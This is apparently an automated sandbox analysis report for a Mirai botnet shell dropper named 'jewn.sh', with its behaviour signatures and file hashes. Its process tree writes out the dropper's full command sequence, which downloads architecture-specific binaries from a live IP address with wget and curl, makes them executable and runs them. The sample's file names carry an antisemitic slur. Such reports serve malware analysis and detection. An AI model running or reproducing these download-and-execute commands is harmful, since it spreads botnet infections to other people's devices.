Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    07/12/2024, 04:11

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    720a5e4e44f99b055d00bf5be3948b2d

  • SHA1

    684fa717c79344199982029892b768a335682f57

  • SHA256

    c5529040db9e0e5cbe26dac8162859d8867ae845a6b2fdfdcad8ee2cfe63ff1d

  • SHA512

    c9b4f2f2e6f9e0c66421ae95641f013e7be7652e9b4787cc84cab88e24fe18e471b77249de3c210fe410e16312dbef499b5e81b8d03ffb4ad1796f5dc1a04b1a

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (92937) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 10 IoCs
  • Changes its process name 5 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:668
    • /usr/bin/wget
      wget http://104.234.240.71/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:674
    • /usr/bin/curl
      curl -O http://104.234.240.71/bins/jew.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:692
    • /bin/cat
      cat jew.x86
      2⤵
        PID:700
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
        2⤵
        • File and Directory Permissions Modification
        PID:701
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:702
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:705
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:706
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:716
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
        2⤵
        • File and Directory Permissions Modification
        PID:717
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:719
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:721
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:731
      • /bin/cat
        cat jew.mpsl
        2⤵
          PID:741
        • /bin/chmod
          chmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
          2⤵
          • File and Directory Permissions Modification
          PID:742
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          PID:744
        • /usr/bin/wget
          wget http://104.234.240.71/bins/jew.arm4
          2⤵
            PID:746
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.arm4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:752
          • /bin/cat
            cat jew.arm4
            2⤵
              PID:759
            • /bin/chmod
              chmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
              2⤵
              • File and Directory Permissions Modification
              PID:761
            • /tmp/jewn
              ./jewn
              2⤵
              • Executes dropped EXE
              PID:763
            • /usr/bin/wget
              wget http://104.234.240.71/bins/jew.arm5
              2⤵
              • Writes file to tmp directory
              PID:764
            • /usr/bin/curl
              curl -O http://104.234.240.71/bins/jew.arm5
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:768
            • /bin/cat
              cat jew.arm5
              2⤵
                PID:771
              • /bin/chmod
                chmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
                2⤵
                • File and Directory Permissions Modification
                PID:772
              • /tmp/jewn
                ./jewn
                2⤵
                • Executes dropped EXE
                PID:773
              • /usr/bin/wget
                wget http://104.234.240.71/bins/jew.arm6
                2⤵
                • Writes file to tmp directory
                PID:774
              • /usr/bin/curl
                curl -O http://104.234.240.71/bins/jew.arm6
                2⤵
                • Checks CPU configuration
                • Writes file to tmp directory
                PID:780
              • /bin/cat
                cat jew.arm6
                2⤵
                  PID:789
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z
                  2⤵
                  • File and Directory Permissions Modification
                  PID:791
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Writes file to system bin folder
                  • Changes its process name
                  PID:792
                • /usr/bin/wget
                  wget http://104.234.240.71/bins/jew.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:796
                • /usr/bin/curl
                  curl -O http://104.234.240.71/bins/jew.arm7
                  2⤵
                  • Checks CPU configuration
                  • Writes file to tmp directory
                  PID:810
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:819
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:820
                • /usr/bin/wget
                  wget http://104.234.240.71/bins/jew.ppc
                  2⤵
                  • Writes file to tmp directory
                  PID:827
                • /usr/bin/curl
                  curl -O http://104.234.240.71/bins/jew.ppc
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:830
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:832
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:833
                • /usr/bin/wget
                  wget http://104.234.240.71/bins/jew.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:839
                • /usr/bin/curl
                  curl -O http://104.234.240.71/bins/jew.m68k
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:843
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:845
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:846
                • /usr/bin/wget
                  wget http://104.234.240.71/bins/jew.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:853
                • /usr/bin/curl
                  curl -O http://104.234.240.71/bins/jew.sh4
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:858
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:864
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:865

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/jewn

                Filesize

                60KB

                MD5

                c790dde9d4762b3e82c0d9e41df91fb9

                SHA1

                341070d0148f795a2b6dd1d988e497f4084bebe7

                SHA256

                e8ca93ec9f737481e131b64981ebf0212958dd1b43ef36a944869ae0f603e6f1

                SHA512

                ffa49eae4d60f3ff6f1b0fe053c5f8293e6eca3737d2805e464336376ca6f705da949936530c595bc33b4c49b7a80d8672f03414f027421394436b26c471697f

              • /tmp/jewn

                Filesize

                125KB

                MD5

                e20014e57c7c30bb2bda9aa339fc4aff

                SHA1

                a49e3de31275f2f55351494da979e4f9c7e97f3c

                SHA256

                c7b2789a6ad425fc8bc48a6b496a2e2d8951ea80a1c908fc7914e99a11674150

                SHA512

                b6db6b572bed7f1bfc9986a3157f8bb8e07ac31b19df39e7b2182c5d432b87a4165584801d0d3a320e93c8bb1b3cd582fcdff4531af2df75523207444673f2df

              • /tmp/jewn

                Filesize

                118KB

                MD5

                e763ac9455273a0ebd7773d550965150

                SHA1

                0b454e4cd734b07ee063c863fe44835653338f35

                SHA256

                4e566bbc9fba17867653b24298e8258311d7ac6f089b28029886e75ed6985594

                SHA512

                7e545ca2faf134e6a5841060791d9bd0a8bffcb3a1d1c056f6b62ac7ad0fb87aff3781ca628e4678fd7d55040d31b186c572270a5509efd9f081e44702c878b1

              • /tmp/jewn

                Filesize

                211B

                MD5

                bf7b89e47bae293118c020c809c6b64f

                SHA1

                0ce398102e0add27eae4027b8785e1a925d44d5d

                SHA256

                d299a926576581b97be372dd08ea722eb47e9d634b5a07669993b42efbc1a5bd

                SHA512

                3ddf7c5a29121f52f3bf2023a86b9f1787ac2e4cd2691d441528e7889868a1c4d97c153f1d1b6ea4a86fb7b2a9cad9888324dcdf92390c8932e17ba486a54409

              • /tmp/jewn

                Filesize

                50KB

                MD5

                7b9dbd5b2bcb6ea0b69a6cd1310f7d08

                SHA1

                9a8fe81ab4fcaa47b7a228844c94814724bd2532

                SHA256

                ff77cdfd76b12940ec6a3d998441cdf399c956f51f5a311c614b59d109bf49d5

                SHA512

                dc0d68aca50d2f186272a5ad2d653454c2aca00a5400da8a91b1d9bcd2dd81f56e121dd4856109777b013fe131d11c23d044819c6c973ea50723617731ba8985

              • /tmp/jewn

                Filesize

                74KB

                MD5

                f0b77c155537d308033ad7b7294b92c9

                SHA1

                1b7c208de04ee6b2f62f7f58f4666bd8cecfbaa7

                SHA256

                07ae7eb36dc1201da22a0ba23e5a4929e78ace0579c1381de021d7cf8c978952

                SHA512

                d475a88b9c68aa75cbcb24cb29254b42638e0d712079a52c3e271a92df8494b1262eaa732d92ea5d0134f56cc1660289d6353d06e7d8a9af19c32b35d5c5ce24